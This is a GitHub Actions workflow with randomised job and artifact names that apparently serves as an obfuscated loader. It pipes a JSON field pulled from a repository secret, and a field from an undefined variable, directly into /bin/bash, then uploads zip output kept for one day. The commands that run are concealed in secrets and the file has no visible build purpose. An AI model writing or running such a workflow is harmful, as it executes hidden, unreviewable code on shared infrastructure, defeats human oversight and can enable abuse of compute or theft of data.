name: monolithef369
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: monolithef369
        env:
          l1: ${{ secrets.l1 }}
        run: |
          printf '%s' "$l1" | jq -r .hxoz568 | /bin/bash
          echo $t42 | jq -r .bzbvf88571 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: QYZjSRbN
          path: "*.zip"
          retention-days: 1
